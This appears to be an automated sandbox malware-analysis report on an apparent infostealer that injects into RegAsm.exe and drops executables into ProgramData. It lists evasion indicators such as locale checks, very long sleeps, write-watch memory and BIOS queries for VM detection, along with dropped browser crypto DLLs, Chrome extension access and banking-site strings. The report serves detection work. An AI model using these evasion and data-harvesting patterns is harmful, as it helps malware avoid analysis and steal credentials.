Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\DHCGHDHIDH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\HDAFIIDAKJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 32C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Memory allocated: 48B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\ProgramData\DHCGHDHIDH.exe	Memory allocated: 5040000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 24B0000 memory reserve \| memory write watch
Source: C:\ProgramData\HDAFIIDAKJ.exe	Memory allocated: 44B0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe	Thread delayed: delay time: 922337203685477

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 6.8 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe TID: 5380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7220	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe TID: 1204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2908	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\HDAFIIDAKJ.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5144	Thread sleep count: 80 > 30

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413540 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	29_2_00413540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040B969 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040B969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041425C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_0041425C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413B50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	29_2_00413B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409B68 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	29_2_00409B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040AB08 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	29_2_0040AB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409317 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004013B4 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	29_2_004013B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00409645 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	29_2_00409645
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040A2C1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	29_2_0040A2C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00413EA0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	29_2_00413EA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 29_2_0041391C GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

29_2_0041391C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00401160 GetSystemInfo,ExitProcess,

3_2_00401160

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userFBKFCFBFID.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\userIEHDAFHDHC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\DHCGHDHIDH.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\HDAFIIDAKJ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: Amcache.hve.33.dr	Binary or memory string: VMware
Source: AAFIDG.29.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: AAFIDG.29.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: RegAsm.exe, 00000018.00000002.1483311475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{
Source: AAFIDG.29.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: RegAsm.exe, 0000001D.00000002.1929039688.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware9
Source: AAFIDG.29.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.33.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AAFIDG.29.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: AAFIDG.29.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
